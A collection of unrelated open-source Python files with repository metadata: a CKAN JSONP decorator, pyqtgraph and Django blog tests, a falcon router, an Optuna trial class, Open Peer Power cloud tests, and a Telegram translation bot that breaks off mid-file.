] | 12 | 2015-08-28T16:59:07.000Z | 2020-03-08T01:39:30.000Z | ckan/lib/jsonp.py | florianm/ckan | 1cfd98d591ac70b4eb81048bcd227b6c1354b1bf | [
"Apache-2.0"
] | 13 | 2019-05-02T21:01:28.000Z | 2020-10-20T23:34:48.000Z | ckan/lib/jsonp.py | florianm/ckan | 1cfd98d591ac70b4eb81048bcd227b6c1354b1bf | [
"Apache-2.0"
] | 10 | 2015-05-08T04:33:20.000Z | 2020-03-03T15:17:58.000Z | import decorator
from ckan.common import json, request, response
def to_jsonp(data):
content_type = 'application/json;charset=utf-8'
result = json.dumps(data, sort_keys=True)
if 'callback' in request.params:
response.headers['Content-Type'] = content_type
cbname = request.params['callback']
result = '%s(%s);' % (cbname, result)
else:
response.headers['Content-Type'] = content_type
return result
def jsonpify(func, *args, **kwargs):
"""A decorator that reformats the output as JSON; or, if the
*callback* parameter is specified (in the HTTP request), as JSONP.
Very much modelled after pylons.decorators.jsonify .
"""
data = func(*args, **kwargs)
return to_jsonp(data)
jsonpify = decorator.decorator(jsonpify)
| 27.586207 | 70 | 0.6725 |
acf6ad0c359a37418c4fb83d399f3f4d95a9d22d | 155 | py | Python | ppython/lab.py | ovolkovskyics/ppython | edad2f90638aa47557e3b75358dc0bd657134a00 | [
"Apache-2.0"
] | 47 | 2019-08-15T05:49:34.000Z | 2022-01-19T06:32:11.000Z | ppython/lab.py | ovolkovskyics/ppython | edad2f90638aa47557e3b75358dc0bd657134a00 | [
"Apache-2.0"
] | 32 | 2019-08-15T20:00:42.000Z | 2022-02-28T17:26:26.000Z | ppython/lab.py | ovolkovskyics/ppython | edad2f90638aa47557e3b75358dc0bd657134a00 | [
"Apache-2.0"
] | 65 | 2019-08-15T14:08:16.000Z | 2022-02-19T13:59:42.000Z | def setup():
print(dist(0, 0, 0, 100))
def draw():
#background(100)
noStroke()
fill(random(255))
ellipse(10, 10, 100, random(50, 100)) | 19.375 | 41 | 0.574194 |
acf6ad721491aeb9cbbafa498f1efe43ed03991f | 2,744 | py | Python | acq4/pyqtgraph/graphicsItems/tests/test_ScatterPlotItem.py | travis-open/acq4 | 2b3a2a6aa7616f6b65d09c3d01cb73e1a07b1088 | [
"MIT"
] | 23 | 2017-09-04T13:20:38.000Z | 2022-03-08T08:15:17.000Z | acq4/pyqtgraph/graphicsItems/tests/test_ScatterPlotItem.py | travis-open/acq4 | 2b3a2a6aa7616f6b65d09c3d01cb73e1a07b1088 | [
"MIT"
] | 4 | 2018-01-05T13:44:29.000Z | 2021-09-30T17:08:15.000Z | acq4/pyqtgraph/graphicsItems/tests/test_ScatterPlotItem.py | travis-open/acq4 | 2b3a2a6aa7616f6b65d09c3d01cb73e1a07b1088 | [
"MIT"
] | 5 | 2017-11-26T19:40:46.000Z | 2021-03-11T17:25:23.000Z | import pyqtgraph as pg
import numpy as np
app = pg.mkQApp()
app.processEvents()
def test_scatterplotitem():
plot = pg.PlotWidget()
# set view range equal to its bounding rect.
# This causes plots to look the same regardless of pxMode.
plot.setRange(rect=plot.boundingRect())
for i, pxMode in enumerate([True, False]):
for j, useCache in enumerate([True, False]):
s = pg.ScatterPlotItem()
s.opts['useCache'] = useCache
plot.addItem(s)
s.setData(x=np.array([10,40,20,30])+i*100, y=np.array([40,60,10,30])+j*100, pxMode=pxMode)
s.addPoints(x=np.array([60, 70])+i*100, y=np.array([60, 70])+j*100, size=[20, 30])
# Test uniform spot updates
s.setSize(10)
s.setBrush('r')
s.setPen('g')
s.setSymbol('+')
app.processEvents()
# Test list spot updates
s.setSize([10] * 6)
s.setBrush([pg.mkBrush('r')] * 6)
s.setPen([pg.mkPen('g')] * 6)
s.setSymbol(['+'] * 6)
s.setPointData([s] * 6)
app.processEvents()
# Test array spot updates
s.setSize(np.array([10] * 6))
s.setBrush(np.array([pg.mkBrush('r')] * 6))
s.setPen(np.array([pg.mkPen('g')] * 6))
s.setSymbol(np.array(['+'] * 6))
s.setPointData(np.array([s] * 6))
app.processEvents()
# Test per-spot updates
spot = s.points()[0]
spot.setSize(20)
spot.setBrush('b')
spot.setPen('g')
spot.setSymbol('o')
spot.setData(None)
app.processEvents()
plot.clear()
def test_init_spots():
plot = pg.PlotWidget()
# set view range equal to its bounding rect.
# This causes plots to look the same regardless of pxMode.
plot.setRange(rect=plot.boundingRect())
spots = [
{'x': 0, 'y': 1},
{'pos': (1, 2), 'pen': None, 'brush': None, 'data': 'zzz'},
]
s = pg.ScatterPlotItem(spots=spots)
# Check we can display without errors
plot.addItem(s)
app.processEvents()
plot.clear()
# check data is correct
spots = s.points()
defPen = pg.mkPen(pg.getConfigOption('foreground'))
assert spots[0].pos().x() == 0
assert spots[0].pos().y() == 1
assert spots[0].pen() == defPen
assert spots[0].data() is None
assert spots[1].pos().x() == 1
assert spots[1].pos().y() == 2
assert spots[1].pen() == pg.mkPen(None)
assert spots[1].brush() == pg.mkBrush(None)
assert spots[1].data() == 'zzz'
if __name__ == '__main__':
test_scatterplotitem()
| 30.153846 | 102 | 0.530612 |
acf6ad838dd28a16aa3babab0f0a9eb0dfdd8010 | 7,593 | py | Python | blog/tests.py | DingNing123/DjangoBlog | 7b073d01a86bfdf3bcdfe58cdf768b5a961b56ea | [
"MIT"
] | null | null | null | blog/tests.py | DingNing123/DjangoBlog | 7b073d01a86bfdf3bcdfe58cdf768b5a961b56ea | [
"MIT"
] | null | null | null | blog/tests.py | DingNing123/DjangoBlog | 7b073d01a86bfdf3bcdfe58cdf768b5a961b56ea | [
"MIT"
] | null | null | null | import os
from django.conf import settings
from django.core.files.uploadedfile import SimpleUploadedFile
from django.core.management import call_command
from django.core.paginator import Paginator
from django.test import Client, RequestFactory, TestCase
from django.urls import reverse
from django.utils import timezone
from DjangoBlog.utils import get_current_site, get_sha256
from accounts.models import BlogUser
from blog.forms import BlogSearchForm
from blog.models import Article, Category, Tag, SideBar, Links
from blog.templatetags.blog_tags import load_pagination_info, load_articletags
# Create your tests here.
class ArticleTest(TestCase):
def setUp(self):
self.client = Client()
self.factory = RequestFactory()
def test_validate_article(self):
site = get_current_site().domain
user = BlogUser.objects.get_or_create(
email="liangliangyy@gmail.com",
username="liangliangyy")[0]
user.set_password("liangliangyy")
user.is_staff = True
user.is_superuser = True
user.save()
response = self.client.get(user.get_absolute_url())
self.assertEqual(response.status_code, 200)
response = self.client.get('/admin/servermanager/emailsendlog/')
response = self.client.get('admin/admin/logentry/')
s = SideBar()
s.sequence = 1
s.name = 'test'
s.content = 'test content'
s.is_enable = True
s.save()
category = Category()
category.name = "category"
category.created_time = timezone.now()
category.last_mod_time = timezone.now()
category.save()
tag = Tag()
tag.name = "nicetag"
tag.save()
article = Article()
article.title = "nicetitle"
article.body = "nicecontent"
article.author = user
article.category = category
article.type = 'a'
article.status = 'p'
article.save()
self.assertEqual(0, article.tags.count())
article.tags.add(tag)
article.save()
self.assertEqual(1, article.tags.count())
for i in range(20):
article = Article()
article.title = "nicetitle" + str(i)
article.body = "nicetitle" + str(i)
article.author = user
article.category = category
article.type = 'a'
article.status = 'p'
article.save()
article.tags.add(tag)
article.save()
from blog.documents import ELASTICSEARCH_ENABLED
if ELASTICSEARCH_ENABLED:
call_command("build_index")
response = self.client.get('/search', {'q': 'nicetitle'})
self.assertEqual(response.status_code, 200)
response = self.client.get(article.get_absolute_url())
self.assertEqual(response.status_code, 200)
from DjangoBlog.spider_notify import SpiderNotify
SpiderNotify.notify(article.get_absolute_url())
response = self.client.get(tag.get_absolute_url())
self.assertEqual(response.status_code, 200)
response = self.client.get(category.get_absolute_url())
self.assertEqual(response.status_code, 200)
response = self.client.get('/search', {'q': 'django'})
self.assertEqual(response.status_code, 200)
s = load_articletags(article)
self.assertIsNotNone(s)
rsp = self.client.get('/refresh')
self.assertEqual(rsp.status_code, 302)
self.client.login(username='liangliangyy', password='liangliangyy')
rsp = self.client.get('/refresh')
self.assertEqual(rsp.status_code, 200)
response = self.client.get(reverse('blog:archives'))
self.assertEqual(response.status_code, 200)
p = Paginator(Article.objects.all(), 2)
self.__check_pagination__(p, '', '')
p = Paginator(Article.objects.filter(tags=tag), 2)
self.__check_pagination__(p, '分类标签归档', tag.slug)
p = Paginator(
Article.objects.filter(
author__username='liangliangyy'), 2)
self.__check_pagination__(p, '作者文章归档', 'liangliangyy')
p = Paginator(Article.objects.filter(category=category), 2)
self.__check_pagination__(p, '分类目录归档', category.slug)
f = BlogSearchForm()
f.search()
# self.client.login(username='liangliangyy', password='liangliangyy')
from DjangoBlog.spider_notify import SpiderNotify
SpiderNotify.baidu_notify([article.get_full_url()])
from blog.templatetags.blog_tags import gravatar_url, gravatar
u = gravatar_url('liangliangyy@gmail.com')
u = gravatar('liangliangyy@gmail.com')
link = Links(
sequence=1,
name="lylinux",
link='https://wwww.lylinux.net')
link.save()
response = self.client.get('/links.html')
self.assertEqual(response.status_code, 200)
rsp = self.client.get('/refresh')
self.assertEqual(rsp.status_code, 200)
response = self.client.get('/feed/')
self.assertEqual(response.status_code, 200)
response = self.client.get('/sitemap.xml')
self.assertEqual(response.status_code, 200)
self.client.get("/admin/blog/article/1/delete/")
self.client.get('/admin/servermanager/emailsendlog/')
self.client.get('admin/admin/logentry/')
def __check_pagination__(self, p, type, value):
s = load_pagination_info(p.page(1), type, value)
self.assertIsNotNone(s)
response = self.client.get(s['previous_url'])
self.assertEqual(response.status_code, 200)
response = self.client.get(s['next_url'])
self.assertEqual(response.status_code, 200)
s = load_pagination_info(p.page(2), type, value)
self.assertIsNotNone(s)
response = self.client.get(s['previous_url'])
self.assertEqual(response.status_code, 200)
response = self.client.get(s['next_url'])
self.assertEqual(response.status_code, 200)
def test_image(self):
import requests
rsp = requests.get(
'https://www.python.org/static/img/python-logo@2x.png')
imagepath = os.path.join(settings.BASE_DIR, 'python.png')
with open(imagepath, 'wb') as file:
file.write(rsp.content)
rsp = self.client.post('/upload')
self.assertEqual(rsp.status_code, 403)
sign = get_sha256(get_sha256(settings.SECRET_KEY))
with open(imagepath, 'rb') as file:
imgfile = SimpleUploadedFile(
'python.png', file.read(), content_type='image/jpg')
form_data = {'python.png': imgfile}
rsp = self.client.post(
'/upload?sign=' + sign, form_data, follow=True)
self.assertEqual(rsp.status_code, 200)
os.remove(imagepath)
from DjangoBlog.utils import save_user_avatar, send_email
send_email(['qq@qq.com'], 'testTitle', 'testContent')
save_user_avatar(
'https://www.python.org/static/img/python-logo@2x.png')
def test_errorpage(self):
rsp = self.client.get('/eee')
self.assertEqual(rsp.status_code, 404)
def test_commands(self):
from blog.documents import ELASTICSEARCH_ENABLED
if ELASTICSEARCH_ENABLED:
call_command("build_index")
call_command("ping_baidu", "all")
call_command("create_testdata")
call_command("clear_cache")
call_command("sync_user_avatar")
call_command("build_search_words")
| 36.681159 | 78 | 0.635981 |
acf6ae355a6159d04d31e65dd5efe08c515e8170 | 825 | py | Python | tests/test_router.py | vinicius0026/falcon-routing-tools | e4f00ec5cfb87d7c7e9aec355e19f010c2b702f3 | [
"MIT"
] | null | null | null | tests/test_router.py | vinicius0026/falcon-routing-tools | e4f00ec5cfb87d7c7e9aec355e19f010c2b702f3 | [
"MIT"
] | null | null | null | tests/test_router.py | vinicius0026/falcon-routing-tools | e4f00ec5cfb87d7c7e9aec355e19f010c2b702f3 | [
"MIT"
] | null | null | null | import sys
import os
sys.path.append('../')
sys.path.append('./')
from falcon_routing_tools import Router
def test_router_resource_decorator():
router = Router()
@router.resource('/some-path')
class SomeResource():
pass
assert len(router.resources) == 1
route = router.resources[0]
assert route.path == '/some-path'
assert route.resource.__name__ == 'SomeResource'
def test_controller_loading():
from fixtures.router import router
base_dir = os.path.join(os.path.dirname(os.path.realpath(__file__)), 'fixtures')
router.load_controllers(base_dir)
assert len(router.resources) == 3
expected_paths = set(['/resource-a', '/resource-a/{id}', '/resource-b'])
actual_paths = set([route.path for route in router.resources])
assert expected_paths == actual_paths | 27.5 | 84 | 0.695758 |
acf6af62d05ec2c2fdb7701f824eac7d4ac4c73e | 7,463 | py | Python | tests/components/cloud/test_client.py | pcaston/Open-Peer-Power | 81805d455c548e0f86b0f7fedc793b588b2afdfd | [
"Apache-2.0"
] | null | null | null | tests/components/cloud/test_client.py | pcaston/Open-Peer-Power | 81805d455c548e0f86b0f7fedc793b588b2afdfd | [
"Apache-2.0"
] | null | null | null | tests/components/cloud/test_client.py | pcaston/Open-Peer-Power | 81805d455c548e0f86b0f7fedc793b588b2afdfd | [
"Apache-2.0"
] | null | null | null | """Test the cloud.iot module."""
from unittest.mock import MagicMock, patch
from aiohttp import web
import pytest
from openpeerpower.components.cloud import DOMAIN
from openpeerpower.components.cloud.client import CloudClient
from openpeerpower.components.cloud.const import PREF_ENABLE_ALEXA, PREF_ENABLE_GOOGLE
from openpeerpower.core import State
from openpeerpower.setup import async_setup_component
from . import mock_cloud, mock_cloud_prefs
from tests.common import mock_coro
from tests.components.alexa import test_smart_home as test_alexa
@pytest.fixture
def mock_cloud_inst():
"""Mock cloud class."""
return MagicMock(subscription_expired=False)
async def test_handler_alexa(opp):
"""Test handler Alexa."""
opp.states.async_set("switch.test", "on", {"friendly_name": "Test switch"})
opp.states.async_set("switch.test2", "on", {"friendly_name": "Test switch 2"})
await mock_cloud(
opp,
{
"alexa": {
"filter": {"exclude_entities": "switch.test2"},
"entity_config": {
"switch.test": {
"name": "Config name",
"description": "Config description",
"display_categories": "LIGHT",
}
},
}
},
)
mock_cloud_prefs(opp)
cloud = opp.data["cloud"]
resp = await cloud.client.async_alexa_message(
test_alexa.get_new_request("Alexa.Discovery", "Discover")
)
endpoints = resp["event"]["payload"]["endpoints"]
assert len(endpoints) == 1
device = endpoints[0]
assert device["description"] == "Config description via Open Peer Power"
assert device["friendlyName"] == "Config name"
assert device["displayCategories"] == ["LIGHT"]
assert device["manufacturerName"] == "Open Peer Power"
async def test_handler_alexa_disabled(opp, mock_cloud_fixture):
"""Test handler Alexa when user has disabled it."""
mock_cloud_fixture._prefs[PREF_ENABLE_ALEXA] = False
cloud = opp.data["cloud"]
resp = await cloud.client.async_alexa_message(
test_alexa.get_new_request("Alexa.Discovery", "Discover")
)
assert resp["event"]["header"]["namespace"] == "Alexa"
assert resp["event"]["header"]["name"] == "ErrorResponse"
assert resp["event"]["payload"]["type"] == "BRIDGE_UNREACHABLE"
async def test_handler_google_actions(opp):
"""Test handler Google Actions."""
opp.states.async_set("switch.test", "on", {"friendly_name": "Test switch"})
opp.states.async_set("switch.test2", "on", {"friendly_name": "Test switch 2"})
opp.states.async_set("group.all_locks", "on", {"friendly_name": "Evil locks"})
await mock_cloud(
opp,
{
"google_actions": {
"filter": {"exclude_entities": "switch.test2"},
"entity_config": {
"switch.test": {
"name": "Config name",
"aliases": "Config alias",
"room": "living room",
}
},
}
},
)
mock_cloud_prefs(opp)
cloud = opp.data["cloud"]
reqid = "5711642932632160983"
data = {"requestId": reqid, "inputs": [{"intent": "action.devices.SYNC"}]}
with patch(
"opp_nabucasa.Cloud._decode_claims",
return_value={"cognito:username": "myUserName"},
):
await cloud.client.get_google_config()
resp = await cloud.client.async_google_message(data)
assert resp["requestId"] == reqid
payload = resp["payload"]
assert payload["agentUserId"] == "myUserName"
devices = payload["devices"]
assert len(devices) == 1
device = devices[0]
assert device["id"] == "switch.test"
assert device["name"]["name"] == "Config name"
assert device["name"]["nicknames"] == ["Config name", "Config alias"]
assert device["type"] == "action.devices.types.SWITCH"
assert device["roomHint"] == "living room"
async def test_handler_google_actions_disabled(opp, mock_cloud_fixture):
"""Test handler Google Actions when user has disabled it."""
mock_cloud_fixture._prefs[PREF_ENABLE_GOOGLE] = False
with patch("opp_nabucasa.Cloud.start", return_value=mock_coro()):
assert await async_setup_component(opp, "cloud", {})
reqid = "5711642932632160983"
data = {"requestId": reqid, "inputs": [{"intent": "action.devices.SYNC"}]}
cloud = opp.data["cloud"]
resp = await cloud.client.async_google_message(data)
assert resp["requestId"] == reqid
assert resp["payload"]["errorCode"] == "deviceTurnedOff"
async def test_webhook_msg(opp):
"""Test webhook msg."""
with patch("opp_nabucasa.Cloud.start", return_value=mock_coro()):
setup = await async_setup_component(opp, "cloud", {"cloud": {}})
assert setup
cloud = opp.data["cloud"]
await cloud.client.prefs.async_initialize()
await cloud.client.prefs.async_update(
cloudhooks={
"hello": {"webhook_id": "mock-webhook-id", "cloudhook_id": "mock-cloud-id"}
}
)
received = []
async def handler(opp, webhook_id, request):
"""Handle a webhook."""
received.append(request)
return web.json_response({"from": "handler"})
opp.components.webhook.async_register("test", "Test", "mock-webhook-id", handler)
response = await cloud.client.async_webhook_message(
{
"cloudhook_id": "mock-cloud-id",
"body": '{"hello": "world"}',
"headers": {"content-type": "application/json"},
"method": "POST",
"query": None,
}
)
assert response == {
"status": 200,
"body": '{"from": "handler"}',
"headers": {"Content-Type": "application/json"},
}
assert len(received) == 1
assert await received[0].json() == {"hello": "world"}
async def test_google_config_expose_entity(opp, mock_cloud_setup, mock_cloud_login):
"""Test Google config exposing entity method uses latest config."""
cloud_client = opp.data[DOMAIN].client
state = State("light.kitchen", "on")
gconf = await cloud_client.get_google_config()
assert gconf.should_expose(state)
await cloud_client.prefs.async_update_google_entity_config(
entity_id="light.kitchen", should_expose=False
)
assert not gconf.should_expose(state)
async def test_google_config_should_2fa(opp, mock_cloud_setup, mock_cloud_login):
"""Test Google config disabling 2FA method uses latest config."""
cloud_client = opp.data[DOMAIN].client
gconf = await cloud_client.get_google_config()
state = State("light.kitchen", "on")
assert gconf.should_2fa(state)
await cloud_client.prefs.async_update_google_entity_config(
entity_id="light.kitchen", disable_2fa=True
)
assert not gconf.should_2fa(state)
async def test_set_username(opp):
"""Test we set username during login."""
prefs = MagicMock(
alexa_enabled=False,
google_enabled=False,
async_set_username=MagicMock(return_value=mock_coro()),
)
client = CloudClient(opp, prefs, None, {}, {})
client.cloud = MagicMock(is_logged_in=True, username="mock-username")
await client.logged_in()
assert len(prefs.async_set_username.mock_calls) == 1
assert prefs.async_set_username.mock_calls[0][1][0] == "mock-username"
| 32.168103 | 87 | 0.636875 |
acf6afc21fa8a7df70653a6b552009f86b2878a2 | 543 | py | Python | core/notification/__init__.py | gahoo/SNAP | 6595a8ab781830e557c75ebd1612c59fdc96114d | [
"MIT"
] | 1 | 2020-01-06T12:07:47.000Z | 2020-01-06T12:07:47.000Z | core/notification/__init__.py | gahoo/SNAP | 6595a8ab781830e557c75ebd1612c59fdc96114d | [
"MIT"
] | null | null | null | core/notification/__init__.py | gahoo/SNAP | 6595a8ab781830e557c75ebd1612c59fdc96114d | [
"MIT"
] | null | null | null | import yaml
import os
import pdb
from ..colorMessage import dyeFAIL
def loadDingTalkConfig():
ding_conf_path = os.path.expanduser("~/.snap/")
if not os.path.exists(ding_conf_path):
os.mkdir(ding_conf_path)
ding_conf_file = os.path.expanduser("~/.snap/dingtalk.conf")
with open(ding_conf_file, 'r') as yaml_file:
return yaml.load(yaml_file)
try:
DINGTALK_CONF = loadDingTalkConfig()
except IOError, e:
print dyeFAIL(str(e))
print "dingtalk robot access_token is missing."
DINGTALK_CONF = None
| 27.15 | 65 | 0.710866 |
acf6afc91bea433533174e6a7e7b85f0a14aa292 | 3,435 | py | Python | apistar/server/router.py | TheCulliganMan/apistarserver | faaf9f6fddc97e9bd97a2ea785d041bbaac91ad5 | [
"BSD-3-Clause"
] | 1 | 2018-09-27T14:50:47.000Z | 2018-09-27T14:50:47.000Z | apistar/server/router.py | TheCulliganMan/apistar | faaf9f6fddc97e9bd97a2ea785d041bbaac91ad5 | [
"BSD-3-Clause"
] | null | null | null | apistar/server/router.py | TheCulliganMan/apistar | faaf9f6fddc97e9bd97a2ea785d041bbaac91ad5 | [
"BSD-3-Clause"
] | null | null | null | import inspect
import re
from urllib.parse import urlparse
import werkzeug
from werkzeug.routing import Map, Rule
from apistar import exceptions
from apistar.compat import dict_type
from apistar.server.core import Include, Route
class BaseRouter:
def lookup(self, path: str, method: str):
raise NotImplementedError()
def reverse_url(self, name: str, **params) -> str:
raise NotImplementedError()
class Router(BaseRouter):
def __init__(self, routes):
rules = []
name_lookups = {}
for path, name, route in self.walk_routes(routes):
path_params = [item.strip("{}") for item in re.findall("{[^}]*}", path)]
args = inspect.signature(route.handler).parameters
for path_param in path_params:
if path_param.startswith("+"):
path = path.replace(
"{%s}" % path_param, "<path:%s>" % path_param.lstrip("+")
)
elif path_param in args and args[path_param].annotation is int:
path = path.replace("{%s}" % path_param, "<int:%s>" % path_param)
elif path_param in args and args[path_param].annotation is float:
path = path.replace("{%s}" % path_param, "<float:%s>" % path_param)
else:
path = path.replace("{%s}" % path_param, "<string:%s>" % path_param)
rule = Rule(path, methods=[route.method], endpoint=name)
rules.append(rule)
name_lookups[name] = route
self.adapter = Map(rules).bind("")
self.name_lookups = name_lookups
# Use an MRU cache for router lookups.
self._lookup_cache = dict_type()
self._lookup_cache_size = 10000
def walk_routes(self, routes, url_prefix="", name_prefix=""):
walked = []
for item in routes:
if isinstance(item, Route):
result = (url_prefix + item.url, name_prefix + item.name, item)
walked.append(result)
elif isinstance(item, Include):
result = self.walk_routes(
item.routes, url_prefix + item.url, name_prefix + item.name + ":"
)
walked.extend(result)
return walked
def lookup(self, path: str, method: str):
lookup_key = method + " " + path
try:
return self._lookup_cache[lookup_key]
except KeyError:
pass
try:
name, path_params = self.adapter.match(path, method)
except werkzeug.exceptions.NotFound:
raise exceptions.NotFound() from None
except werkzeug.exceptions.MethodNotAllowed:
raise exceptions.MethodNotAllowed() from None
except werkzeug.routing.RequestRedirect as exc:
path = urlparse(exc.new_url).path
raise exceptions.Found(path) from None
route = self.name_lookups[name]
self._lookup_cache[lookup_key] = (route, path_params)
if len(self._lookup_cache) > self._lookup_cache_size:
self._lookup_cache.pop(next(iter(self._lookup_cache)))
return (route, path_params)
def reverse_url(self, name: str, **params) -> str:
try:
return self.adapter.build(name, params)
except werkzeug.routing.BuildError as exc:
raise exceptions.NoReverseMatch(str(exc)) from None
| 36.157895 | 88 | 0.591266 |
acf6b0acf09d585d9c9e1d3921076623254b4ad0 | 7,018 | py | Python | boexplain/optuna/optuna/trial/_frozen.py | sfu-db/BOExplain | a933badd9af1e039579927e41233f824c59db3f8 | [
"MIT"
] | 8 | 2021-02-15T09:21:17.000Z | 2021-12-21T20:37:21.000Z | boexplain/optuna/optuna/trial/_frozen.py | sfu-db/BOExplain | a933badd9af1e039579927e41233f824c59db3f8 | [
"MIT"
] | null | null | null | boexplain/optuna/optuna/trial/_frozen.py | sfu-db/BOExplain | a933badd9af1e039579927e41233f824c59db3f8 | [
"MIT"
] | 2 | 2021-02-15T09:17:35.000Z | 2021-06-21T16:50:58.000Z | import datetime
import warnings
# from optuna import distributions
# from optuna import logging
# from optuna.trial._state import TrialState
from .. import distributions
from .. import logging
from ._state import TrialState
_logger = logging.get_logger(__name__)
class FrozenTrial(object):
"""Status and results of a :class:`~optuna.trial.Trial`.
Attributes:
number:
Unique and consecutive number of :class:`~optuna.trial.Trial` for each
:class:`~optuna.study.Study`. Note that this field uses zero-based numbering.
state:
:class:`TrialState` of the :class:`~optuna.trial.Trial`.
value:
Objective value of the :class:`~optuna.trial.Trial`.
datetime_start:
Datetime where the :class:`~optuna.trial.Trial` started.
datetime_complete:
Datetime where the :class:`~optuna.trial.Trial` finished.
params:
Dictionary that contains suggested parameters.
user_attrs:
Dictionary that contains the attributes of the :class:`~optuna.trial.Trial` set with
:func:`optuna.trial.Trial.set_user_attr`.
intermediate_values:
Intermediate objective values set with :func:`optuna.trial.Trial.report`.
"""
def __init__(
self,
number, # type: int
state, # type: TrialState
value, # type: Optional[float]
datetime_start, # type: Optional[datetime.datetime]
datetime_complete, # type: Optional[datetime.datetime]
params, # type: Dict[str, Any]
distributions, # type: Dict[str, BaseDistribution]
user_attrs, # type: Dict[str, Any]
system_attrs, # type: Dict[str, Any]
intermediate_values, # type: Dict[int, float]
trial_id, # type: int
):
# type: (...) -> None
self.number = number
self.state = state
self.value = value
self.datetime_start = datetime_start
self.datetime_complete = datetime_complete
self.params = params
self.user_attrs = user_attrs
self.system_attrs = system_attrs
self.intermediate_values = intermediate_values
self._distributions = distributions
self._trial_id = trial_id
# Ordered list of fields required for `__repr__`, `__hash__` and dataframe creation.
# TODO(hvy): Remove this list in Python 3.6 as the order of `self.__dict__` is preserved.
_ordered_fields = [
"number",
"value",
"datetime_start",
"datetime_complete",
"params",
"_distributions",
"user_attrs",
"system_attrs",
"intermediate_values",
"_trial_id",
"state",
]
def __eq__(self, other):
# type: (Any) -> bool
if not isinstance(other, FrozenTrial):
return NotImplemented
return other.__dict__ == self.__dict__
def __lt__(self, other):
# type: (Any) -> bool
if not isinstance(other, FrozenTrial):
return NotImplemented
return self.number < other.number
def __le__(self, other):
# type: (Any) -> bool
if not isinstance(other, FrozenTrial):
return NotImplemented
return self.number <= other.number
def __hash__(self):
# type: () -> int
return hash(tuple(getattr(self, field) for field in self._ordered_fields))
def __repr__(self):
# type: () -> str
return "{cls}({kwargs})".format(
cls=self.__class__.__name__,
kwargs=", ".join(
"{field}={value}".format(
field=field if not field.startswith("_") else field[1:],
value=repr(getattr(self, field)),
)
for field in self._ordered_fields
),
)
def _validate(self):
# type: () -> None
if self.datetime_start is None:
raise ValueError("`datetime_start` is supposed to be set.")
if self.state.is_finished():
if self.datetime_complete is None:
raise ValueError("`datetime_complete` is supposed to be set for a finished trial.")
else:
if self.datetime_complete is not None:
raise ValueError(
"`datetime_complete` is supposed to be None for an unfinished trial."
)
if self.state == TrialState.COMPLETE and self.value is None:
raise ValueError("`value` is supposed to be set for a complete trial.")
if set(self.params.keys()) != set(self.distributions.keys()):
raise ValueError(
"Inconsistent parameters {} and distributions {}.".format(
set(self.params.keys()), set(self.distributions.keys())
)
)
for param_name, param_value in self.params.items():
distribution = self.distributions[param_name]
param_value_in_internal_repr = distribution.to_internal_repr(param_value)
if not distribution._contains(param_value_in_internal_repr):
raise ValueError(
"The value {} of parameter '{}' isn't contained in the distribution "
"{}.".format(param_value, param_name, distribution)
)
@property
def distributions(self):
# type: () -> Dict[str, BaseDistribution]
"""Dictionary that contains the distributions of :attr:`params`."""
return self._distributions
@distributions.setter
def distributions(self, value):
# type: (Dict[str, BaseDistribution]) -> None
self._distributions = value
@property
def trial_id(self):
# type: () -> int
"""Return the trial ID.
.. deprecated:: 0.19.0
The direct use of this attribute is deprecated and it is recommended that you use
:attr:`~optuna.trial.FrozenTrial.number` instead.
Returns:
The trial ID.
"""
warnings.warn(
"The use of `FrozenTrial.trial_id` is deprecated. "
"Please use `FrozenTrial.number` instead.",
DeprecationWarning,
)
_logger.warning(
"The use of `FrozenTrial.trial_id` is deprecated. "
"Please use `FrozenTrial.number` instead."
)
return self._trial_id
@property
def last_step(self):
# type: () -> Optional[int]
if len(self.intermediate_values) == 0:
return None
else:
return max(self.intermediate_values.keys())
@property
def duration(self):
# type: () -> Optional[datetime.timedelta]
"""Return the elapsed time taken to complete the trial.
Returns:
The duration.
"""
if self.datetime_start and self.datetime_complete:
return self.datetime_complete - self.datetime_start
else:
return None
| 32.045662 | 99 | 0.589057 |
acf6b158461c07800e6586f89c5e5d3d9c02b46d | 11,561 | py | Python | plugins/translate.py | darkmanrandy/Google_Translater_V2 | 21c23153d4f84ce762497df69e4dc3113abf077d | [
"Apache-2.0"
] | null | null | null | plugins/translate.py | darkmanrandy/Google_Translater_V2 | 21c23153d4f84ce762497df69e4dc3113abf077d | [
"Apache-2.0"
] | null | null | null | plugins/translate.py | darkmanrandy/Google_Translater_V2 | 21c23153d4f84ce762497df69e4dc3113abf077d | [
"Apache-2.0"
] | null | null | null | from googletrans import Translator
from pyrogram import Client, filters
from pyrogram.types import (
InlineKeyboardButton,
InlineKeyboardMarkup
)
from helper.database import find , insert
@Client.on_message(filters.private & filters.command(['start']))
async def start(client, message):
insert(int(message.chat.id))
await message.reply_text(
text =f"Hello **{message.from_user.first_name }** \n\n __I am simple Google Translater Bot \n I can translate any language to you selected language__",
reply_to_message_id = message.message_id,
reply_markup=InlineKeyboardMarkup(
[ [ InlineKeyboardButton("Support 🇮🇳" ,url="https://t.me/tharamaanateambot") ],[InlineKeyboardButton("Subscribe 🧐", url="https://t.me/tendkotta") ] ] ) )
@Client.on_message(filters.private & filters.text )
async def echo(client, message):
keybord1= InlineKeyboardMarkup( [
[
InlineKeyboardButton("Tamil", callback_data='ta'),
InlineKeyboardButton("Albanian", callback_data='sq'),
InlineKeyboardButton("Amharic",callback_data ='am'),
],
[ InlineKeyboardButton("Arabic", callback_data='ar'),
InlineKeyboardButton("Armenian", callback_data='hy'),
InlineKeyboardButton("Azerbaijani",callback_data = 'az'),
],
[InlineKeyboardButton("Basque",callback_data ="eu"),
InlineKeyboardButton("Belarusian",callback_data ="be"),
InlineKeyboardButton("Bengali",callback_data="bn")],
[InlineKeyboardButton("Bosnian",callback_data = "bs"),
InlineKeyboardButton("Bulgarian",callback_data ="bg"),
InlineKeyboardButton("Catalan",callback_data = "ca")
],
[
InlineKeyboardButton("Corsican",callback_data ="co"),
InlineKeyboardButton("Croatian",callback_data = "hr"),
InlineKeyboardButton("Czech", callback_data = "cs"),
],
[ InlineKeyboardButton("Danish",callback_data = "da"),
InlineKeyboardButton("Dutch",callback_data = "nl"),
InlineKeyboardButton("Esperanto",callback_data = "eo"),
],
[InlineKeyboardButton(" Next --->",callback_data = "page2")
]
] )
code =find(int(message.chat.id))
if code :
translator = Translator()
translation = translator.translate(message.text,dest = code)
await message.reply_text(translation.text)
else:
await message.reply_text("Select language 👇",reply_to_message_id = message.message_id, reply_markup =keybord1)
@Client.on_callback_query()
async def translate_text(bot,update):
keybord1= InlineKeyboardMarkup( [
[
InlineKeyboardButton("Tamil", callback_data='ta'),
